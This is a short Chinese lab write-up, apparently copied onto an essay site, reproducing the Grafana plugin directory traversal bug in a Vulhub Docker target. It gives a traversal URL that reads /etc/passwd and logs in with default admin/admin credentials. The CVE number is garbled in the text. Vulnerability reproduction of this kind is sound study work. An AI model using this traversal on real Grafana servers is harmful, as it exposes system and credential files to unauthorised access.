1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > grafana 目录遍历(CVE--43798)漏洞复现

grafana 目录遍历(CVE--43798)漏洞复现

时间:2021-02-11 00:26:46

相关推荐

grafana 目录遍历(CVE--43798)漏洞复现

grafana 目录遍历(CVE--43798)漏洞复现

漏洞描述:

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

启动Vulhub靶场镜像

cd /vulhub/grafana/CVE--43798docker-compose up -d

访问靶机环境

admin/admin弱密码登录

获取一个登录后的GET包并修改url

/public/plugins/welcome/…/…/…/…/…/…/…/…/…/etc/passwd

最终的flag藏在grafana的历史命令里

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。